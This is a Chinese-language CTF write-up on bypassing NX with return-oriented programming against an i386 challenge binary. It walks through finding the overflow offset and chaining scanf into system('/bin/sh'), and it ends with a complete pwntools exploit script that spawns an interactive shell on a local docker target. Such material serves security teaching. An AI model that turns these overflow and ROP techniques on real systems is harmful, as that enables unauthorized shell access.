[详细] ROP:绕过NX策略
我们使用的例子是这篇博客中的第一个例子:https://bbs.ichunqiu.com/thread-42530-1-1.html?from=sec,在i386环境中运行,很简单的一道题,这里提供一种更加简单的解法,只需细致观察,可以免除一些不必要的计算。
程序链接:https://pan.baidu.com/s/1dgiR7KwEjkI4i5nLJ-5jzQ 提取码:4zza
NX策略是使栈区域的代码无法执行,但我们可以使用ROP绕过。
ROP技术就是不需要自己手动写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。可直接根据这个简单的例子来理解。
查看安全策略
如图,可见程序开启了NX防护。
将程序拖进IDA中,查看汇编代码及伪代码:
可见,使用了_isoc00_scanf函数,发生了溢出,应该是v1参数是一个字符串数组,向v1输入字符串即可溢出。但具体溢出位置还要调试时确定,接下来开始调试。
计算具体溢出位置
先执行过mov ebp,asp后:
再看栈区的栈底:
画框的就是返回的地址,因为刚刚之前的ebp入栈了,所以栈底的紧下方就是调用main之前的返回地址。接下来执行到scanf的位置,然后转到linux系统中输入:
接下来从栈底到栈顶中间位置寻找8个A,就是十六进制的41:
可以看到,距离栈底有52个字节,也就是说,第53~56个字节的内容会正好覆盖返回地址。但即使这样,我们也不能通过手写shellcode的方式实现溢出获取shell。只能在函数中寻找看有没有其他机会。
利用思路
我们想要执行的是system("/bin/sh")函数,所以我们应该找到system的位置和字符串"/bin/sh"。
其实打开IDA的时候就注意了,文件本身导入了system函数,但没有发现"/bin/sh"字符串,不过不要紧,因为文件本身使用了scanf,我们可以手动输入"/bin/sh"字符串,只需要寻找一个可读可写的段来存储这个"/bin/sh"(8字节)就好:
Load段就不错,当然其他段也可以,这里起始地址是0x0804A030,既然要使用scanf函数,所以我们自然还需要另一个参数%s,这个字符串由于在原文件中也调用了scanf,所以我们也可以找到,就是0x08048629:
在这之后我们整理一下思路,首先,需要通过栈溢出覆盖main函数的返回地址,直接覆盖为system函数的地址是肯定不行的,因为这时还没有system的参数"/bin/sh",所以我们应该先输入"/bin/sh",那么就应该先调用scanf,即使用scanf的地址覆盖main的返回地址。然后会调用scanf函数,所以我们还需要使用栈溢出来输入scanf函数的参数。但需要注意的是,在scanf函数的地址和参数之间还夹着一个scanf的返回地址,就是scanf执行到rtn时EIP跳转的地址。结构如下:
在这里我们向让scanf函数执行之后直接执行system函数,所以在scanf的返回地址上填上system的地址。但system还有返回地址和参数需要填写,而栈中接下来的确实scanf函数的参数,其实这里是不影响的,因为这里调用scanf函数,负责清理栈空间(清理参数)的也是scanf,也就是说scanf函数执行结束会将自己的参数清理,这里是怎么看出来的?我们查看汇编源码:
从scanf之后一直到retn,没有任何一个语句对ESP进行了加法操作,正常来讲(C++默认的调用约定__cdecl调用约定),由调用者管理栈空间,也就是说在调用完scanf之后应该有一个add esp,8的操作。这里再主函数中没有发现,所以推断是使用的“被调用者管理栈空间”的调用约定。也就是说如果我们将栈区覆盖为以下的样子,那么调用结束之后会变成这样:
也就是说栈空间会正好变成调用system函数的样子,其中system函数的返回地址随便填写就行。
利用代码:
首先要在docker中开启监听:
socat tcp-listen:1002,reuseaddr,fork EXEC:./pwn1,pty,raw
然后python代码如下,代码修改自原博客版:
#!/usr/bin/python
#coding:utf-8
from pwn import *
context.update(arch = 'i386', os = 'linux', timeout = 1)
io = remote('172.17.0.3', 1002)
elf = ELF('./pwn1')
scanf_addr = p32(elf.symbols['__isoc99_scanf']) #plt表中scanf函数所在内存地址
system_addr = p32(elf.symbols['system']) #plt表中system函数所在内存地址
main_addr = p32(0x08048531) #main函数地址
format_s = p32(0x08048629) #字符串"%s"所在内存地址
binsh_addr = p32(0x0804a030) #从内存中找到的可写地址
shellcode1 = 'A'*0x34 #padding
shellcode1 += scanf_addr # 调用scanf以从STDIN读取"/bin/sh"字符串
shellcode1 += system_addr # scanf返回后到system函数
shellcode1 += format_s # scanf参数
shellcode1 += binsh_addr # "/bin/sh"字符串所在地址,scanf的第二个参数
shellcode1 += 'aaaa' # system函数返回地址,随便填
shellcode1 += binsh_addr #system函数的参数,binsh的地址
print io.read()
io.sendline(shellcode1)
sleep(0.1) #等待程序执行,防止出错
print io.read()
io.sendline('/bin/sh')
sleep(0.1) #等待程序执行,防止出错
print io.read()
io.interactive()
结果:
感兴趣的同学可以去原博客查看,非常简单的一道题,只不过原博客中使用了更长的rop链,第二次调用main时还需要重新计算一次栈的覆盖长度,比较麻烦,而经过仔细观察后发现scanf函数自己清空了参数,那么可以使用简单的方法直接调用system函数。
参考(原博客):https://bbs.ichunqiu.com/thread-42530-1-1.html?from=sec